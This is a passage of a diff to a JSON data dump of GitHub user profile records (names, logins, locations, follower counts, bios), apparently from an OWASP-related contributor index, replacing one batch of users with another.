"nest_created_at": "2024-09-12T01:16:04.897Z", - "nest_updated_at": "2024-09-12T01:16:04.897Z", - "name": "Jean-Yves NOLEN", - "login": "jynolen", + "nest_created_at": "2024-09-22T09:35:42.182Z", + "nest_updated_at": "2024-09-22T19:34:44.359Z", + "name": "Jethro Muller", + "login": "AceFire6", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1485801?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4126778?v=4", "company": "", - "location": "", + "location": "Cape Town, South Africa", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, - "public_gists_count": 3, - "public_repositories_count": 22, - "created_at": "2012-02-29T16:53:56Z", - "updated_at": "2024-08-16T16:33:36Z", - "node_id": "MDQ6VXNlcjE0ODU4MDE=", + "following_count": 22, + "followers_count": 39, + "public_gists_count": 0, + "public_repositories_count": 52, + "created_at": "2013-04-11T13:53:54Z", + "updated_at": "2024-08-15T13:45:35Z", + "node_id": "MDQ6VXNlcjQxMjY3Nzg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -418903,199 +678027,199 @@ }, { "model": "github.user", - "pk": 2347, + "pk": 7685, "fields": { - "nest_created_at": "2024-09-12T01:16:06.184Z", - "nest_updated_at": "2024-09-12T01:16:06.184Z", - "name": "", - "login": "nareshbogathi", - "email": "nareshbogathi@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/22889650?v=4", - "company": "Capgemini", - "location": "Amsterdam", + "nest_created_at": "2024-09-22T09:35:42.493Z", + "nest_updated_at": "2024-09-22T19:34:44.669Z", + "name": "Grant McConnaughey", + "login": "grantmcconnaughey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4023140?v=4", + "company": "@TomaticLLC ", + "location": "United States", "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 33, - "created_at": "2016-10-17T14:01:10Z", - "updated_at": "2023-04-04T16:03:32Z", - "node_id": "MDQ6VXNlcjIyODg5NjUw", - "bio": "", + "following_count": 27, + "followers_count": 145, + "public_gists_count": 15, + "public_repositories_count": 51, + "created_at": "2013-04-01T03:10:58Z", + "updated_at": "2024-09-12T19:45:20Z", + "node_id": "MDQ6VXNlcjQwMjMxNDA=", + "bio": "🧀 Wisconsin-based software developer\r\n🕝 Founder of Postpone (www.postpone.app)\r\n⚡️ Formerly: Sr. Backend Engineer @Zapier", "is_hireable": false, - "twitter_username": "" + "twitter_username": "gmcconnaughey" } }, { "model": "github.user", - "pk": 2348, + "pk": 7686, "fields": { - "nest_created_at": "2024-09-12T01:16:07.498Z", - "nest_updated_at": "2024-09-12T01:16:07.498Z", - "name": "Marius", - "login": "gietschess", + "nest_created_at": "2024-09-22T09:35:42.811Z", + "nest_updated_at": "2024-09-22T19:34:45.000Z", + "name": "Denis", + "login": "delneg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/49275246?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10036256?v=4", "company": "", - "location": "Germany", + "location": "Dubai", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-04-04T11:23:50Z", - "updated_at": "2024-07-26T08:23:54Z", - "node_id": "MDQ6VXNlcjQ5Mjc1MjQ2", - "bio": "", + "following_count": 144, + "followers_count": 74, + "public_gists_count": 6, + "public_repositories_count": 111, + "created_at": "2014-12-01T19:52:01Z", + "updated_at": "2024-07-21T08:47:54Z", + "node_id": "MDQ6VXNlcjEwMDM2MjU2", + "bio": "Python/Django, Golang, F#/C#, Objective-C/Swift, Scala, Solidity, Rust, Kotlin.\r\nPreviously Ruby, Elixir, R.\r\nProduction Usefulness > Beauty", "is_hireable": false, - "twitter_username": "" + "twitter_username": "thedelneg" } }, { "model": "github.user", - "pk": 2349, + "pk": 7687, "fields": { - "nest_created_at": "2024-09-12T01:16:08.746Z", - "nest_updated_at": "2024-09-12T01:16:08.746Z", - "name": "", - "login": "andrew-myer", + "nest_created_at": "2024-09-22T09:35:43.143Z", + "nest_updated_at": "2024-09-22T19:34:45.312Z", + "name": "David D Lowe", + "login": "Flimm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10202735?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/355454?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2014-12-16T01:59:15Z", - "updated_at": "2024-09-11T20:36:32Z", - "node_id": "MDQ6VXNlcjEwMjAyNzM1", - "bio": "", - "is_hireable": false, + "following_count": 14, + "followers_count": 33, + "public_gists_count": 5, + "public_repositories_count": 167, + "created_at": "2010-08-05T18:02:22Z", + "updated_at": "2024-08-13T17:29:47Z", + "node_id": "MDQ6VXNlcjM1NTQ1NA==", + "bio": "PyPI: flimm, NPM: flimm, CPAN: flimm", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2350, + "pk": 7688, "fields": { - "nest_created_at": "2024-09-12T01:16:10.012Z", - "nest_updated_at": "2024-09-12T01:16:10.012Z", - "name": "", - "login": "CyberAbwehr", + "nest_created_at": "2024-09-22T09:35:43.460Z", + "nest_updated_at": "2024-09-22T19:34:45.625Z", + "name": "Chris Griffin", + "login": "chris-griffin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51229037?v=4", - "company": "SBA Research", - "location": "Vienna", + "avatar_url": "https://avatars.githubusercontent.com/u/1795659?v=4", + "company": "@narmi", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 4, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-05-31T08:30:29Z", - "updated_at": "2024-04-23T12:47:31Z", - "node_id": "MDQ6VXNlcjUxMjI5MDM3", - "bio": "I love to support open source security projects. ;-)", + "public_repositories_count": 35, + "created_at": "2012-05-30T20:54:17Z", + "updated_at": "2024-09-20T13:41:37Z", + "node_id": "MDQ6VXNlcjE3OTU2NTk=", + "bio": "Founder @narmi. @georgetown-university grad. Former CTO of the nation's largest student-run financial institution. Former Equity Trader at Barclays Capital", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2351, + "pk": 7689, "fields": { - "nest_created_at": "2024-09-12T01:16:11.263Z", - "nest_updated_at": "2024-09-13T05:10:14.414Z", - "name": "lfama", - "login": "lfama", - "email": "luca.p.fama@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/14056990?v=4", - "company": "", - "location": "127.1", + "nest_created_at": "2024-09-22T09:35:43.769Z", + "nest_updated_at": "2024-09-22T19:34:45.945Z", + "name": "AmirAli Akbari", + "login": "amiraliakbari", + "email": "amiraliakbari@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/336772?v=4", + "company": "عرش، ویداد", + "location": "Tehran, Iran", "collaborators_count": 0, - "following_count": 12, - "followers_count": 13, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2015-08-31T14:57:39Z", - "updated_at": "2024-08-21T10:04:29Z", - "node_id": "MDQ6VXNlcjE0MDU2OTkw", - "bio": "“so’ stato ricco, e non l’ho saputo”", + "following_count": 71, + "followers_count": 78, + "public_gists_count": 20, + "public_repositories_count": 40, + "created_at": "2010-07-19T10:22:57Z", + "updated_at": "2024-08-29T14:06:23Z", + "node_id": "MDQ6VXNlcjMzNjc3Mg==", + "bio": "Web Developer & Consultant in @arsh-co, Fractaal and VidAd. Teaching @ce419 web course in Sharif University.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2352, + "pk": 7690, "fields": { - "nest_created_at": "2024-09-12T01:16:12.514Z", - "nest_updated_at": "2024-09-18T19:05:36.672Z", - "name": "benamar", - "login": "benamar19", + "nest_created_at": "2024-09-22T09:35:44.093Z", + "nest_updated_at": "2024-09-22T19:34:46.401Z", + "name": "", + "login": "qburst-afsal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10367262?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/54843064?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2015-01-01T22:49:31Z", - "updated_at": "2024-07-16T16:17:48Z", - "node_id": "MDQ6VXNlcjEwMzY3MjYy", + "public_repositories_count": 3, + "created_at": "2019-09-03T10:24:31Z", + "updated_at": "2021-01-20T12:56:55Z", + "node_id": "MDQ6VXNlcjU0ODQzMDY0", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2353, + "pk": 7691, "fields": { - "nest_created_at": "2024-09-12T01:18:37.799Z", - "nest_updated_at": "2024-09-12T01:18:55.862Z", - "name": "Greg Anderson", - "login": "devGregA", + "nest_created_at": "2024-09-22T09:35:48.380Z", + "nest_updated_at": "2024-09-22T19:34:50.600Z", + "name": "David Burke", + "login": "bufke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4741312?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/739307?v=4", + "company": "Burke Software and Consulting LLC", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 0, - "followers_count": 33, - "public_gists_count": 2, - "public_repositories_count": 21, - "created_at": "2013-06-19T18:49:00Z", - "updated_at": "2024-07-22T02:20:01Z", - "node_id": "MDQ6VXNlcjQ3NDEzMTI=", - "bio": "", + "following_count": 1, + "followers_count": 89, + "public_gists_count": 3, + "public_repositories_count": 66, + "created_at": "2011-04-19T15:18:42Z", + "updated_at": "2024-07-17T19:27:43Z", + "node_id": "MDQ6VXNlcjczOTMwNw==", + "bio": "I'm mostly on gitlab now. https://gitlab.com/bufke", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2354, + "pk": 7692, "fields": { - "nest_created_at": "2024-09-12T01:18:54.273Z", - "nest_updated_at": "2024-09-12T01:19:00.032Z", - "name": "Jay Paz", - "login": "grendel513", + "nest_created_at": "2024-09-22T09:35:48.703Z", + "nest_updated_at": "2024-09-22T19:34:50.911Z", + "name": "Wills Ward", + "login": "willseward", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/233694?v=4", - "company": "DefectDojo, Inc.", - "location": "Austin, TX", + "avatar_url": "https://avatars.githubusercontent.com/u/5386568?v=4", + "company": "@microsoft", + "location": "Fort Worth, TX", "collaborators_count": 0, - "following_count": 0, - "followers_count": 10, + "following_count": 2, + "followers_count": 4, "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2010-03-30T21:36:21Z", - "updated_at": "2024-09-03T22:56:59Z", - "node_id": "MDQ6VXNlcjIzMzY5NA==", + "public_repositories_count": 50, + "created_at": "2013-09-04T23:36:01Z", + "updated_at": "2024-09-03T16:16:56Z", + "node_id": "MDQ6VXNlcjUzODY1Njg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419103,49 +678227,49 @@ }, { "model": "github.user", - "pk": 2355, + "pk": 7693, "fields": { - "nest_created_at": "2024-09-12T01:19:35.547Z", - "nest_updated_at": "2024-09-12T03:12:06.902Z", - "name": "Jeffrey Walton", - "login": "noloader", - "email": "noloader, gmail account", - "avatar_url": "https://avatars.githubusercontent.com/u/3538226?v=4", + "nest_created_at": "2024-09-22T09:35:49.029Z", + "nest_updated_at": "2024-09-22T19:34:51.222Z", + "name": "", + "login": "juanvasquez", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2237828?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 9, - "followers_count": 148, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 43, - "created_at": "2013-02-12T03:23:56Z", - "updated_at": "2024-08-26T11:25:08Z", - "node_id": "MDQ6VXNlcjM1MzgyMjY=", + "public_repositories_count": 2, + "created_at": "2012-08-29T00:06:15Z", + "updated_at": "2016-02-27T03:17:44Z", + "node_id": "MDQ6VXNlcjIyMzc4Mjg=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2356, + "pk": 7694, "fields": { - "nest_created_at": "2024-09-12T01:19:36.379Z", - "nest_updated_at": "2024-09-12T01:19:36.379Z", + "nest_created_at": "2024-09-22T09:35:49.346Z", + "nest_updated_at": "2024-09-22T19:34:51.557Z", "name": "", - "login": "mirasifali", + "login": "fromageball", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19987388?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2670670?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-06-17T03:47:40Z", - "updated_at": "2024-06-24T10:07:20Z", - "node_id": "MDQ6VXNlcjE5OTg3Mzg4", + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2012-10-28T19:48:44Z", + "updated_at": "2016-07-06T16:23:38Z", + "node_id": "MDQ6VXNlcjI2NzA2NzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419153,74 +678277,99 @@ }, { "model": "github.user", - "pk": 2357, + "pk": 7695, "fields": { - "nest_created_at": "2024-09-12T01:19:38.208Z", - "nest_updated_at": "2024-09-12T01:19:38.208Z", - "name": "", - "login": "NeilOconner", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/141781845?v=4", + "nest_created_at": "2024-09-22T09:35:57.276Z", + "nest_updated_at": "2024-09-22T19:38:12.303Z", + "name": "Samuel Ameh", + "login": "propersam", + "email": "propersam2012@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17215988?v=4", "company": "", - "location": "", + "location": "Lagos, Nigeria", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-08T21:31:57Z", - "updated_at": "2023-08-24T07:10:14Z", - "node_id": "U_kgDOCHNrVQ", - "bio": "", + "following_count": 5, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 76, + "created_at": "2016-02-13T10:48:09Z", + "updated_at": "2024-09-17T19:13:47Z", + "node_id": "MDQ6VXNlcjE3MjE1OTg4", + "bio": "Simple, straight to the point and a fast learner | Software Developer | Data-science / Machine-learning enthusiasts | Bug Researcher in the making", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2358, + "pk": 7696, "fields": { - "nest_created_at": "2024-09-12T01:19:39.008Z", - "nest_updated_at": "2024-09-12T01:19:39.008Z", - "name": "Risto McGehee", - "login": "risto-liftoff", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/133720088?v=4", - "company": "Liftoff", - "location": "", + "nest_created_at": "2024-09-22T09:35:57.587Z", + "nest_updated_at": "2024-09-22T19:38:14.813Z", + "name": "Saurabh", + "login": "dr3dd589", + "email": "skumar1@mt.iitr.ac.in", + "avatar_url": "https://avatars.githubusercontent.com/u/31597172?v=4", + "company": "Nutanix", + "location": "IIT Roorkee", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 37, + "followers_count": 25, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2023-05-15T23:56:01Z", - "updated_at": "2024-07-19T16:27:23Z", - "node_id": "U_kgDOB_hoGA", - "bio": "Security Engineer at Liftoff", + "public_repositories_count": 27, + "created_at": "2017-09-03T19:02:49Z", + "updated_at": "2024-09-03T17:33:35Z", + "node_id": "MDQ6VXNlcjMxNTk3MTcy", + "bio": "Application Security Engineer | GSoC'19 @OWASP\r\n", + "is_hireable": false, + "twitter_username": "_dr3dd_" + } +}, +{ + "model": "github.user", + "pk": 7697, + "fields": { + "nest_created_at": "2024-09-22T09:35:58.526Z", + "nest_updated_at": "2024-09-22T19:35:01.253Z", + "name": "Patrik Nordlén", + "login": "patriknordlen", + "email": "patriki@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5840042?v=4", + "company": "", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2013-11-02T19:57:08Z", + "updated_at": "2024-08-17T18:26:06Z", + "node_id": "MDQ6VXNlcjU4NDAwNDI=", + "bio": "Security guy", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2359, + "pk": 7698, "fields": { - "nest_created_at": "2024-09-12T01:19:39.808Z", - "nest_updated_at": "2024-09-12T01:19:39.808Z", + "nest_created_at": "2024-09-22T09:35:58.837Z", + "nest_updated_at": "2024-09-22T19:37:39.191Z", "name": "", - "login": "brunomcuesta", + "login": "alles-klar", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/816237?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16321214?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 5, - "public_gists_count": 5, - "public_repositories_count": 5, - "created_at": "2011-05-28T20:02:23Z", - "updated_at": "2024-07-05T14:41:34Z", - "node_id": "MDQ6VXNlcjgxNjIzNw==", + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2015-12-16T12:30:46Z", + "updated_at": "2024-09-18T11:32:32Z", + "node_id": "MDQ6VXNlcjE2MzIxMjE0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419228,24 +678377,24 @@ }, { "model": "github.user", - "pk": 2360, + "pk": 7699, "fields": { - "nest_created_at": "2024-09-12T01:19:40.695Z", - "nest_updated_at": "2024-09-12T01:19:40.695Z", - "name": "Alex Brenes", - "login": "alexbrenes", + "nest_created_at": "2024-09-22T09:36:00.425Z", + "nest_updated_at": "2024-09-22T19:35:03.161Z", + "name": "Blake Owens", + "login": "blakeaowens", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/70926767?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76979297?v=4", + "company": "DefectDojo", + "location": "Denton, Texas", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2020-09-08T01:47:32Z", - "updated_at": "2024-07-23T18:00:37Z", - "node_id": "MDQ6VXNlcjcwOTI2NzY3", + "public_repositories_count": 1, + "created_at": "2021-01-05T00:52:16Z", + "updated_at": "2024-08-22T02:21:14Z", + "node_id": "MDQ6VXNlcjc2OTc5Mjk3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419253,99 +678402,99 @@ }, { "model": "github.user", - "pk": 2361, + "pk": 7700, "fields": { - "nest_created_at": "2024-09-12T01:19:41.513Z", - "nest_updated_at": "2024-09-18T19:06:05.059Z", - "name": "Ralph Mei", - "login": "r-heimann", + "nest_created_at": "2024-09-22T09:36:01.093Z", + "nest_updated_at": "2024-09-22T19:37:31.434Z", + "name": "Lakmali Piyarathna", + "login": "piyarathnalakmali", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/121236014?v=4", - "company": "DB Systel", - "location": "Erfurt, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/36252628?v=4", + "company": "WSO2", + "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-12-22T12:35:17Z", - "updated_at": "2024-07-03T08:17:44Z", - "node_id": "U_kgDOBznqLg", - "bio": "Cloud Administrator @dbsystel", + "public_repositories_count": 49, + "created_at": "2018-02-08T03:17:30Z", + "updated_at": "2024-07-31T08:30:24Z", + "node_id": "MDQ6VXNlcjM2MjUyNjI4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2362, + "pk": 7701, "fields": { - "nest_created_at": "2024-09-12T01:20:21.522Z", - "nest_updated_at": "2024-09-18T19:06:30.773Z", - "name": "OWASP Benchmark", - "login": "OWASP-Benchmark", - "email": "dave.wichers@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/80600360?v=4", + "nest_created_at": "2024-09-22T09:36:01.404Z", + "nest_updated_at": "2024-09-22T19:35:04.142Z", + "name": "Felix Hernandez", + "login": "felixhernandez15", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74625535?v=4", "company": "", - "location": "", + "location": "Chihuahua Mexico", "collaborators_count": 0, "following_count": 0, - "followers_count": 40, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-03-13T20:14:53Z", - "updated_at": "2024-04-01T16:26:06Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjgwNjAwMzYw", - "bio": "This is the home for all the OWASP Benchmark related projects. The primary project is BenchmarkJava (what was just 'the OWASP Benchmark' previously).", + "public_repositories_count": 0, + "created_at": "2020-11-17T20:38:01Z", + "updated_at": "2021-10-25T17:16:45Z", + "node_id": "MDQ6VXNlcjc0NjI1NTM1", + "bio": "Software Developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2363, + "pk": 7702, "fields": { - "nest_created_at": "2024-09-12T01:20:25.813Z", - "nest_updated_at": "2024-09-12T01:20:25.813Z", - "name": "", - "login": "l34d51n63r", + "nest_created_at": "2024-09-22T09:36:02.381Z", + "nest_updated_at": "2024-09-22T19:35:05.106Z", + "name": "James Bowie", + "login": "jpbowie", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12156639?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/23224163?v=4", "company": "", - "location": "Karlsruhe", + "location": "", "collaborators_count": 0, - "following_count": 3, + "following_count": 0, "followers_count": 2, "public_gists_count": 0, "public_repositories_count": 3, - "created_at": "2015-04-28T16:27:04Z", - "updated_at": "2024-09-06T07:53:24Z", - "node_id": "MDQ6VXNlcjEyMTU2NjM5", - "bio": "Security Researcher", + "created_at": "2016-11-02T22:19:43Z", + "updated_at": "2024-08-20T22:29:53Z", + "node_id": "MDQ6VXNlcjIzMjI0MTYz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2364, + "pk": 7703, "fields": { - "nest_created_at": "2024-09-12T01:20:26.620Z", - "nest_updated_at": "2024-09-12T01:20:26.620Z", - "name": "", - "login": "thornmaker", + "nest_created_at": "2024-09-22T09:36:02.694Z", + "nest_updated_at": "2024-09-22T19:35:05.413Z", + "name": "Felix Hernandez", + "login": "FelixHernandez", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13333288?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7889626?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-07-14T13:24:04Z", - "updated_at": "2024-01-14T01:33:51Z", - "node_id": "MDQ6VXNlcjEzMzMzMjg4", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2014-06-14T17:54:21Z", + "updated_at": "2024-09-20T05:15:17Z", + "node_id": "MDQ6VXNlcjc4ODk2MjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419353,24 +678502,24 @@ }, { "model": "github.user", - "pk": 2365, + "pk": 7704, "fields": { - "nest_created_at": "2024-09-12T01:20:28.664Z", - "nest_updated_at": "2024-09-12T02:21:02.220Z", - "name": "", - "login": "javabeanz", + "nest_created_at": "2024-09-22T09:36:03.016Z", + "nest_updated_at": "2024-09-22T19:35:05.731Z", + "name": "agarcia@theworkshop.com", + "login": "twsagarcia", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3225772?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/49308957?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 22, - "followers_count": 15, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2013-01-09T13:07:35Z", - "updated_at": "2024-08-19T11:23:17Z", - "node_id": "MDQ6VXNlcjMyMjU3NzI=", + "public_repositories_count": 2, + "created_at": "2019-04-05T11:17:51Z", + "updated_at": "2024-03-18T09:26:44Z", + "node_id": "MDQ6VXNlcjQ5MzA4OTU3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419378,74 +678527,74 @@ }, { "model": "github.user", - "pk": 2366, + "pk": 7705, "fields": { - "nest_created_at": "2024-09-12T01:20:29.947Z", - "nest_updated_at": "2024-09-12T01:20:29.947Z", - "name": "", - "login": "maksim-pinguin", + "nest_created_at": "2024-09-22T09:36:03.335Z", + "nest_updated_at": "2024-09-22T19:35:06.046Z", + "name": "Hendrik M Halkow", + "login": "hendrikhalkow", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33628723?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/205553?v=4", + "company": "Forward H", + "location": "Hamburg, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 23, + "followers_count": 22, "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2017-11-13T13:59:13Z", - "updated_at": "2024-08-24T14:59:24Z", - "node_id": "MDQ6VXNlcjMzNjI4NzIz", + "public_repositories_count": 0, + "created_at": "2010-02-17T21:15:43Z", + "updated_at": "2024-09-20T08:39:06Z", + "node_id": "MDQ6VXNlcjIwNTU1Mw==", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "hendrikhalkow" } }, { "model": "github.user", - "pk": 2367, + "pk": 7706, "fields": { - "nest_created_at": "2024-09-12T01:20:30.815Z", - "nest_updated_at": "2024-09-12T01:20:30.815Z", - "name": "akhvee", - "login": "akhvee", + "nest_created_at": "2024-09-22T09:36:03.658Z", + "nest_updated_at": "2024-09-22T19:35:06.392Z", + "name": "Charles Neill", + "login": "cneill", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1526307?v=4", - "company": "Software Engineer", - "location": "Santa Clara, CA", + "avatar_url": "https://avatars.githubusercontent.com/u/1749665?v=4", + "company": "", + "location": "Austin, TX", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2012-03-11T18:28:23Z", - "updated_at": "2024-03-17T03:50:30Z", - "node_id": "MDQ6VXNlcjE1MjYzMDc=", - "bio": "", + "following_count": 4, + "followers_count": 39, + "public_gists_count": 16, + "public_repositories_count": 48, + "created_at": "2012-05-17T16:14:24Z", + "updated_at": "2024-05-08T17:53:09Z", + "node_id": "MDQ6VXNlcjE3NDk2NjU=", + "bio": "Risky business", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2368, + "pk": 7707, "fields": { - "nest_created_at": "2024-09-12T01:20:31.660Z", - "nest_updated_at": "2024-09-12T01:20:31.660Z", - "name": "maltek", - "login": "maltek", + "nest_created_at": "2024-09-22T09:36:04.279Z", + "nest_updated_at": "2024-09-22T19:35:07.030Z", + "name": "", + "login": "dogboat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1694194?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19554266?v=4", "company": "", - "location": "DE", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 16, + "following_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2012-04-30T23:49:13Z", - "updated_at": "2024-05-15T10:33:42Z", - "node_id": "MDQ6VXNlcjE2OTQxOTQ=", + "public_repositories_count": 5, + "created_at": "2016-05-24T14:31:38Z", + "updated_at": "2024-08-07T18:14:39Z", + "node_id": "MDQ6VXNlcjE5NTU0MjY2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -419453,74 +678602,74 @@ }, { "model": "github.user", - "pk": 2369, + "pk": 7708, "fields": { - "nest_created_at": "2024-09-12T01:20:33.325Z", - "nest_updated_at": "2024-09-12T01:20:33.325Z", - "name": "Mahdi Rezaie", - "login": "mahdirezaie336", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/61153639?v=4", - "company": "Amirkabir University of Technology", - "location": "Tehran, Iran", + "nest_created_at": "2024-09-22T09:36:04.600Z", + "nest_updated_at": "2024-09-22T19:35:07.341Z", + "name": "Dmitry", + "login": "shipko", + "email": "mukovkin@yandex.ru", + "avatar_url": "https://avatars.githubusercontent.com/u/1519243?v=4", + "company": "CFT", + "location": "Россия, Томск", "collaborators_count": 0, - "following_count": 101, - "followers_count": 98, + "following_count": 6, + "followers_count": 13, "public_gists_count": 0, - "public_repositories_count": 43, - "created_at": "2020-02-17T14:43:46Z", - "updated_at": "2024-09-11T20:22:45Z", - "node_id": "MDQ6VXNlcjYxMTUzNjM5", - "bio": "CE Student at AUT", + "public_repositories_count": 31, + "created_at": "2012-03-09T08:16:13Z", + "updated_at": "2024-09-13T16:03:47Z", + "node_id": "MDQ6VXNlcjE1MTkyNDM=", + "bio": "AppSec Lead, FinTech org", "is_hireable": true, - "twitter_username": "mahdirezaie336" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2370, + "pk": 7709, "fields": { - "nest_created_at": "2024-09-12T01:20:34.145Z", - "nest_updated_at": "2024-09-18T19:06:28.967Z", - "name": "", - "login": "thc202", + "nest_created_at": "2024-09-22T09:36:04.932Z", + "nest_updated_at": "2024-09-22T19:35:07.655Z", + "name": "Paul Osinski", + "login": "paulOsinski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4639210?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42211303?v=4", + "company": "DefectDojo Inc", + "location": "US", "collaborators_count": 0, - "following_count": 1, - "followers_count": 143, - "public_gists_count": 0, - "public_repositories_count": 66, - "created_at": "2013-06-07T10:28:09Z", - "updated_at": "2024-09-17T19:19:43Z", - "node_id": "MDQ6VXNlcjQ2MzkyMTA=", - "bio": "", - 